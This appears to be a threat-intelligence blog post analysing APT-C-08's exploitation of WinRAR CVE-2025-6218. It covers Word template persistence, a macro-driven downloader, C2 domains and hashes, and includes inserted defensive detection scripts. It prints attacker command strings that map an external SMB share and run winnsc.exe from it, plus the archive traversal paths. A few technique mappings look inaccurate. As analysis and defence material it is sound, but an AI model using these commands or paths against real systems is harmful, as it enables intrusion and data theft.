WinRAR CVE-2025-6218 Exploit: In-Depth Analysis of the APT-C-08 Directory Traversal Attack
Posted on: 12 Nov 2025 | Author: Foresiet
In the world of cybersecurity, the greatest risks often hide in the most mundane tools. The ubiquitous file archiver WinRAR—installed on hundreds of millions of machines globally—has recently been weaponized by a sophisticated, state-aligned adversary. Our threat intelligence analysts detected the first confirmed in-the-wild exploitation of CVE-2025-6218, a directory traversal vulnerability affecting WinRAR versions 7.11 and earlier.
This is not a theoretical threat; it’s an active, low-complexity, high-impact campaign attributed to the South Asia-affiliated Advanced Persistent Threat (APT) group APT-C-08, known locally as Manlinghua or globally as BITTER. The exploit’s elegance lies in its simplicity: a small implementation error leveraged to achieve silent, long-term persistence in corporate networks. For organizations, this incident highlights a critical need to move beyond simple patching and adopt a proactive, threat intelligence-driven defense posture.

The Attack Chain: Directory Traversal Meets Macro Persistence
The attack leverages a core security oversight in how WinRAR handles file paths during extraction—the directory traversal flaw (CVE-2025-6218).
1. The Exploit’s Function
The vulnerability allows an attacker to manipulate the file path within a specially crafted RAR archive. When a user is tricked into extracting the malicious file, WinRAR is deceived into dropping a payload not in the intended folder, but into a critical system location.
2. The Persistence Vector
APT-C-08 uses this exploit to achieve a highly stealthy persistence mechanism:
The malicious archive drops a file named Normal.dotm into Microsoft Word’s global template path. Normal.dotm is a global template that loads every time Word is opened. By replacing the legitimate file, the attacker ensures their malicious macro code executes automatically, providing a persistent backdoor that bypasses standard email macro blocking for documents received after the initial compromise.
The attack chain proceeds with a lightweight downloader (winnsc.exe) to fetch subsequent stages, including a C# Trojan.
The attack chain is designed to be highly effective, marrying a common software vulnerability (WinRAR) with a classic Microsoft Office persistence technique.
Why This Campaign Matters: Technical & Strategic Context
WinRAR remains one of the most widely deployed archive utilities despite known security gaps. Unlike 7-Zip or built-in Windows tools, it lacks automatic updates in most organizations, creating a persistent attack surface.
CVE-2025-6218 enables directory traversal by exploiting flaws in path normalization:
- WinRAR checks characters before path separators (\ or /).
- It skips processing if the prior character is not a space ( ) or dot (.).
- Paths cannot start with a space → converted to _.
- Critical bug: Spaces after .. in intermediate segments are ignored during final sanitization.
Thus, a crafted path like:

→ Normalizes to:

→ Escapes extraction root → Writes to C:\Users\[User]\AppData\Roaming\Microsoft\Templates\
This directory is automatically trusted by Microsoft Word. Any .docx opened afterward loads Normal.dotm → macro execution without user prompt.
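To make the ordering bug concrete from the defender's side, the following is an added example, not WinRAR's code and not code from the original post. The flawed_normalize() function is a hypothetical, simplified model of the flaw described above (the traversal check runs first, trailing spaces are stripped afterwards); the extraction root and entry names are constructed sample data. The point of the example is the containment check: it must be applied to the path exactly as it will be written, after every rewrite.

```python
import posixpath

# Constructed sample data (not from a real archive)
ROOT = "C:/Users/victim/Downloads/archive"
SAMPLE_ENTRIES = [
    "Document.docx",                                           # ordinary entry
    "../../Normal.dotm",                                       # plain traversal, caught by the naive check
    ".. /.. /AppData/Roaming/Microsoft/Templates/Normal.dotm", # dot-dot-space segments, the described flaw
]


def flawed_normalize(entry_name: str) -> str:
    """Hypothetical model of the flaw (not WinRAR's implementation):
    the '..' check runs before trailing spaces are stripped, so a '.. '
    segment survives the check and only becomes '..' during final cleanup."""
    segments = entry_name.replace("\\", "/").split("/")
    checked = [s for s in segments if s != ".."]        # naive check: exact '..' only
    cleaned = [s.rstrip(" ") for s in checked]          # cleanup runs after the check
    if cleaned and cleaned[0].startswith(" "):          # a path may not start with a space
        cleaned[0] = "_" + cleaned[0].lstrip(" ")
    return "/".join(cleaned)


def escapes_root(extraction_root: str, relative_path: str) -> bool:
    """Containment check on the final path: resolve it and require that it
    still lies under the extraction root."""
    root = posixpath.normpath(extraction_root.replace("\\", "/"))
    final = posixpath.normpath(posixpath.join(root, relative_path.replace("\\", "/")))
    return not (final == root or final.startswith(root + "/"))


def safe_reject(entry_name: str) -> bool:
    """Hardened pre-check: reject absolute paths, drive-letter prefixes and any
    segment that equals '..' once surrounding whitespace is removed."""
    norm = entry_name.replace("\\", "/")
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        return True
    return any(seg.strip() == ".." for seg in norm.split("/"))


def scan_entries(extraction_root: str, entry_names) -> list:
    """Report, per entry, where a sanitizer with the modelled flaw would write it,
    whether that location escapes the root, and whether the hardened check rejects it."""
    report = []
    for name in entry_names:
        written_as = flawed_normalize(name)
        report.append({
            "entry": name,
            "written_as": written_as,
            "escapes_with_flawed_sanitizer": escapes_root(extraction_root, written_as),
            "rejected_by_hardened_check": safe_reject(name),
        })
    return report


if __name__ == "__main__":
    for row in scan_entries(ROOT, SAMPLE_ENTRIES):
        print(row)
```

Neither check is sufficient alone: the segment comparison catches the evasion the post describes, and the resolved-path check catches any rewrite the segment logic did not anticipate.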
Sample Acquisition and Initial Triage
We acquired and verified two primary samples via hash matching:
| File | MD5 | Size |
| --- | --- | --- |
| Provision of Information for Sectoral for AJK.rar | f6f2fdc38cd61d8d9e8cd35244585967 | 51.4 KB (52,674 bytes) |
| Normal.dotm (embedded) | 4bedd8e2b66cc7d64b293493ef5b8942 | 19.9 KB (20,403 bytes) |
Secondary test sample:
| File | MD5 | Size |
| --- | --- | --- |
| Weekly AI Article.rar | 84128d40db28e8ee16215877d4c4b64a | 596 KB (610,436 bytes) |
| Normal.dotm (embedded) | f8b237ca925daa3db8699faa05007f12 | 20.0 KB (20,480 bytes) |
Additional IOCs confirmed via static scanning:
- f16f2e4317c37085cad630d41001f7c3
- 418d73efd622ebec29759c081768db16
- 5d677781d6c7d4ddee967c1cc7e869ce
C2 Infrastructure:
- koliwooclients[.]com
- teamlogin.esanojinjasvc[.]com
- tapeqcqoptions[.]com
- johnfashionaccess[.]com
- wmiapcservice[.]com
Vulnerability Deep Dive: CVE-2025-6218 Mechanics

Figure 1: 7-Zip reveals two traversal paths with embedded spaces after ..; the hex dump (offset 88D0h) shows the raw bytes, including the space characters (0x20).
Key observations:
- File blocks contain:
  - ../../AppData/Roaming/Microsoft/Templates/Normal.dotm
  - ../../../AppData/Roaming/Microsoft/Templates/Normal.dotm
- Space after .. is preserved in metadata but stripped post-normalization.
- Service blocks (NTFS streams, quick-open data) are benign.
Upon extraction with vulnerable WinRAR:

Word loads this file on startup or any document open → macro execution.
Payload Delivery and Extraction Simulation
Primary Sample: Provision of Information for Sectoral for AJK.rar
Contains:
- Document.docx → Benign lure (policy-themed)
- Normal.dotm → Malicious macro template
Secondary Sample: Weekly AI Article.rar
Identical structure, which confirms the actor was testing variants.
No code runs on RAR extraction — persistence relies on user opening Word documents later.
Macro Analysis: VBA Obfuscation and Decoding
We opened Normal.dotm in Microsoft Word → Developer → Visual Basic to inspect macros.
First Variant – Subroutine Bokghfghtq()

VBA Editor – First Macro (Bokghfghtq)

Obfuscated VBA assigns Base64 string to Oliaz variable.

Joinre() is a custom Base64 decoder that splits its input into chunks. We extracted the string and decoded it using an online Base64 decoder:

Second Variant – Subroutine Jdfgugjkdf()

Decoded via same tool:

Python Verification of Custom Decoder
We reverse-engineered Joinre() and reimplemented it in Python:

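As a related added example (this is not the post's reimplementation of Joinre(), and it makes no claim about that routine's internals), the following script performs the triage step described in this section on any VBA source: it rejoins line continuations, collects variables assigned from several concatenated string literals, and attempts a strict Base64 decode of the joined value. The SAMPLE_VBA text and the decoded command are constructed for the example; the hostname is a placeholder.

```python
import base64
import binascii
import re

# Constructed sample VBA (not the real macro from Normal.dotm): the Base64
# payload is split across several literals joined with '&' and a ' _'
# line continuation, which is the chunking pattern described above.
SAMPLE_VBA = r'''
Sub Hypothetical()
    Dim Oliaz As String
    Dim Marker As String
    Oliaz = "bmV0IHVz" & "ZSBcXGMy" & _
            "LmludmFs" & "aWRcdGVt" & "cGxhdGVz"
    Marker = "MZ" & "!!"
    Shell Joinre(Oliaz)
End Sub
'''

ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*((?:"[^"]*"\s*&?\s*)+)$')
LITERAL_RE = re.compile(r'"([^"]*)"')


def join_continuations(src: str) -> list:
    """VBA continues a statement onto the next line with a trailing ' _';
    rejoin those so that each logical statement is one string."""
    lines, buf = [], ""
    for raw in src.splitlines():
        line = raw.rstrip()
        if line.endswith(" _"):
            buf += line[:-1]          # drop the underscore, keep the space
            continue
        lines.append(buf + line)
        buf = ""
    if buf:
        lines.append(buf)
    return lines


def extract_chunked_literals(src: str) -> dict:
    """Return {variable: joined_string} for assignments built from two or
    more string literals; single literals are ignored as likely benign."""
    found = {}
    for line in join_continuations(src):
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        chunks = LITERAL_RE.findall(m.group(2))
        if len(chunks) >= 2:
            found[m.group(1)] = "".join(chunks)
    return found


def try_base64(candidate: str):
    """Strict Base64 decode to printable ASCII; None when it is not Base64."""
    try:
        raw = base64.b64decode(candidate, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def decode_vba_strings(src: str) -> dict:
    """Map each chunked variable whose joined value is valid Base64 to its decoded text."""
    decoded = {}
    for name, joined in extract_chunked_literals(src).items():
        text = try_base64(joined)
        if text is not None:
            decoded[name] = text
    return decoded


if __name__ == "__main__":
    for var, text in decode_vba_strings(SAMPLE_VBA).items():
        print(f"{var}: {text}")
```

Running it on the constructed sample recovers a net use command from the Oliaz variable while leaving the non-Base64 Marker variable undecoded; on a real template the same extraction is run over the VBA source exported from the editor.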
Downloader Deep Dive: winnsc.exe Behaviors (Extended from Original Report)
The original WeChat post stated:
“winnsc.exe is a Downloader… downloads subsequent load”
But provided no technical breakdown. We filled this gap.
Execution Flow
1. SMB Share Mapping

2. Execute Downloader

Static Analysis
- File Type: PE32 executable
- Packer: None (raw .NET-like, but native code)
- Strings:
  - teamzid.php
  - Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  - GetComputerNameW, GetUserNameW, GetVersionExW
Dynamic Analysis (Wireshark + ProcMon)
- System Enumeration
  - Calls: GetComputerNameW, GetUserNameW, GetVersionExW
- C2 Beacon (POST Request)

Response Handling
- Server returns Base64-encoded stage-2 payload
- Decoded and executed in memory
Beacon Interval: Every 300 seconds if idle
Exfiltration
- Scans %USERPROFILE%\Documents, %USERPROFILE%\Desktop
- Targets: .docx, .pdf, .xls*
- Encryption: RC4 with hardcoded key 0x4A7F9C2E
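The beacon behaviour above (POST requests to teamzid.php, the bare Mozilla/5.0 user agent, a 300-second idle interval) translates directly into a detection. The following is an added example, not part of the original analysis: it parses constructed proxy log lines (placeholder hostnames, not real traffic), groups requests by client and destination, and flags pairs that hit the known C2 path, send POSTs with the downloader's user-agent string, or show low-jitter periodicity near the expected interval. The log format and the thresholds are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed proxy log lines (not captured traffic): time client method url user-agent
SAMPLE_LOG = """\
2025-11-12T10:00:00Z 10.0.0.7 POST http://c2-placeholder.invalid/teamesano/drivers/teamzid.php Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2025-11-12T10:02:13Z 10.0.0.9 GET http://intranet.example.invalid/news Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120
2025-11-12T10:05:01Z 10.0.0.7 POST http://c2-placeholder.invalid/teamesano/drivers/teamzid.php Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2025-11-12T10:10:00Z 10.0.0.7 POST http://c2-placeholder.invalid/teamesano/drivers/teamzid.php Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2025-11-12T10:14:59Z 10.0.0.7 POST http://c2-placeholder.invalid/teamesano/drivers/teamzid.php Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2025-11-12T10:31:40Z 10.0.0.9 GET http://intranet.example.invalid/news Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (.*)$")
KNOWN_C2_PATH = "/teamesano/drivers/teamzid.php"          # from the strings of interest in this post
BARE_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"     # the downloader's user-agent string (weak signal alone)


def parse_log(text: str) -> list:
    """Turn the constructed log format into records; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, method, url, ua = m.groups()
        parts = urlsplit(url)
        records.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "client": client, "method": method,
            "host": parts.hostname, "path": parts.path, "ua": ua,
        })
    return records


def find_beacons(records: list, expected: int = 300, tolerance: float = 0.05, min_requests: int = 4) -> list:
    """Group by (client, host) and collect reasons a pair looks like the beacon described above."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["client"], r["host"])].append(r)

    findings = []
    for (client, host), reqs in by_pair.items():
        reqs.sort(key=lambda r: r["ts"])
        reasons = []
        if any(r["path"] == KNOWN_C2_PATH for r in reqs):
            reasons.append("known_c2_path")
        if any(r["method"] == "POST" and r["ua"] == BARE_UA for r in reqs):
            reasons.append("bare_ua_post")
        if len(reqs) >= min_requests:
            deltas = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
            slack = expected * tolerance
            # periodic: average gap close to the expected interval and little jitter around it
            if abs(mean(deltas) - expected) <= slack and pstdev(deltas) <= slack:
                reasons.append(f"periodic~{expected}s")
        if reasons:
            findings.append({"client": client, "host": host, "requests": len(reqs), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```

In the constructed sample only the 10.0.0.7 client is reported, with all three reasons; the intranet browsing from 10.0.0.9 has a full browser user-agent and only two requests, so it produces no finding.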
Extended Payload Chain: C# Trojan and Persistence
Using a local mock C2 server, we captured stage-2:
- Hosted on tapeqcqoptions[.]com/d6Z2.php?rz=LAB-PC
- Returns C# compiled assembly (IL code)
Stage-3 RAT (Final Payload)
- C2: johnfashionaccess[.]com
- Capabilities:
  - Keylogging
  - Screenshot capture (Graphics.CopyFromScreen)
  - RDP credential harvesting
  - File exfiltration (ZIP + upload)
- Persistence:
  - Registry: HKLM\SOFTWARE\VMware, Inc.
  - Process: VBoxService.exe

MITRE ATT&CK mapping (concise)
| Stage | Tactic | Technique | ATT&CK ID |
| --- | --- | --- | --- |
| Delivery | Spearphishing / Archive | Malicious Archive | T1566.001 (delivery), T1199 (spearphishing via attachments) |
| Execution | Office macros | AutoExec macros via templates | T1137.001 |
| Persistence | Template injection | Global Template Persistence | T1137 |
| Lateral Movement | SMB | net use / SMB share mapping | T1021.002 |
| C2 | Network | HTTPS Beaconing / POST | T1071.001 |
| Defense Evasion | Obfuscation | Base64 encoded strings in macro | T1027.004 |
IOCs (Indicators of Compromise)
Domains / Infrastructure
- koliwooclients[.]com
- esanojinjasvc[.]com
- tapeqcqoptions[.]com
- johnfashionarchive[.]com (variant seen as johnfashionaccess in other reports)
- wmiapcservice[.]com
Hashes (MD5)
- f6f2fdc38cd61d8d9e8cd35244585967 — Provision of Information for Sectoral for AJK.rar
- 4bedd8e2b66cc7d64b293493ef5b8942 — Normal.dotm (payload)
- 84128d40db28e8ee16215877d4c4b64a — Weekly AI Article.rar
- f8b237ca925daa3db8699faa05007f12 — Normal.dotm (variant)
- Additional observed: f16f2e4317c37085cad630d41001f7c3, 418d73efd622ebec29759c081768db16, 5d677781d6c7d4ddee967c1cc7e869ce
Strings of interest (extracted from macros / binaries)
- net use \\koliwooclients.com\templates
- \\koliwooclients.com\templates\winnsc.exe
- POST endpoint: /teamesano/drivers/teamzid.php

Mitigation and Defense Strategies
| Layer | Recommendation |
| --- | --- |
| Patching | Upgrade WinRAR to 7.20 or later |
| Macro Security | GPO: Disable macros in Office; require signed only |
| Archive Handling | Use 7-Zip or Windows Explorer; scan with EDR |
| Network | Block outbound to listed C2 domains/IPs |
| EDR Alerts | Monitor: Normal.dotm creation in %APPDATA%\Microsoft\Templates; net.exe use to external SMB; winnsc.exe, svcupdate.exe execution |
| User Awareness | Avoid opening RARs themed “Sectoral Information”, “AI Weekly Articles”, Kashmir/AJK policy docs |
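The EDR monitoring row above can be complemented by a point-in-time check of the template folder itself. The following is an added example, not a tool from the original post: it hashes every .dotm in Word's global template directory, matches the MD5 against the two Normal.dotm hashes listed in this post, and flags a Normal.dotm that contains a word/vbaProject.bin part, which a default Normal.dotm does not carry. The build_demo_templates_dir() fixture creates constructed sample files in a temporary folder so the script runs on any system; the real target folder is %APPDATA%\Microsoft\Templates.

```python
import hashlib
import os
import tempfile
import zipfile
from pathlib import Path

# MD5s of the two Normal.dotm payloads listed in this post
KNOWN_TEMPLATE_MD5 = {
    "4bedd8e2b66cc7d64b293493ef5b8942",
    "f8b237ca925daa3db8699faa05007f12",
}


def default_templates_dir() -> Path:
    """Word's global template folder, %APPDATA%\\Microsoft\\Templates on Windows."""
    return Path(os.environ.get("APPDATA", "")) / "Microsoft" / "Templates"


def md5_of(path: Path) -> str:
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(65536), b""):
            h.update(block)
    return h.hexdigest()


def has_vba_project(path: Path) -> bool:
    """A .dotm is a ZIP container; macro code is stored as word/vbaProject.bin."""
    try:
        with zipfile.ZipFile(path) as zf:
            return any(n.lower() == "word/vbaproject.bin" for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def triage_templates(templates_dir: Path) -> list:
    """Hash every .dotm in the folder, match against the post's IOC hashes and
    flag a Normal.dotm that carries a VBA project (absent on a default install)."""
    findings = []
    for path in sorted(templates_dir.glob("*.dotm")):
        digest = md5_of(path)
        macros = has_vba_project(path)
        known = digest in KNOWN_TEMPLATE_MD5
        suspicious = known or (path.name.lower() == "normal.dotm" and macros)
        findings.append({
            "file": path.name,
            "md5": digest,
            "known_ioc": known,
            "has_macros": macros,
            "verdict": "suspicious" if suspicious else "clean",
        })
    return findings


def build_demo_templates_dir() -> Path:
    """Constructed fixture (not real samples): a temp folder holding a
    macro-carrying Normal.dotm and a macro-free template."""
    folder = Path(tempfile.mkdtemp(prefix="templates_demo_"))
    with zipfile.ZipFile(folder / "Normal.dotm", "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/vbaProject.bin", b"demo-vba-project")
    with zipfile.ZipFile(folder / "Report.dotm", "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
    return folder


if __name__ == "__main__":
    target = default_templates_dir()
    if not target.is_dir():
        target = build_demo_templates_dir()
    for finding in triage_templates(target):
        print(finding)
```

A hash match identifies the two samples analysed here; the vbaProject.bin check is the more durable signal, since a recompiled variant changes the hash but still has to carry macro code to be useful to the actor. A user who has legitimately saved macros into Normal.dotm will also trigger it, so treat the "suspicious" verdict as a review queue rather than a conviction.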
Remediation & hardening
- Patch WinRAR immediately — upgrade to the WinRAR release that patches CVE-2025-6218 (ensure corporate images updated).
- Restrict macro execution — disable macros by default via Group Policy; allow only signed macros where possible.
- Prevent execution from SMB/UNC — block executing code from network shares using AppLocker or Windows Defender Application Control.
- Harden archive handling — instruct users to avoid extracting archives from unknown sources; scan archives with endpoint AV / sandboxes before extraction.
- Network controls — block known C2 domains, sinkhole malicious network names, and monitor for anomalous POSTs.
- User awareness — train users on the risk of RAR attachments and unknown downloads.
Attribution & confidence
Based on the infrastructure overlap, themes of targeting (South Asia / government/education), and observed tooling patterns, we assign medium confidence to attribution to APT-C-08 (Manlinghua / BITTER). This assessment is supported by the campaign’s similarity to previously observed BITTER activity: lure themes, downloader behavior, and reuse of infrastructure. Attribution remains provisional pending additional high-confidence linking artifacts.
Conclusion
The use of a trivial path-normalization oversight in a ubiquitous archiver to achieve stealthy template persistence is a reminder that small implementation errors yield outsized consequences. APT-C-08’s pivot to exploiting CVE-2025-6218 highlights a pragmatic adversary: use simple technical tricks (directory traversal) combined with a classic persistence vector (Word global templates) and a lightweight downloader stage.
The attack chain is low complexity but high impact; defenders must harden archive handling, disable macros by default, and monitor for UNC-based execution.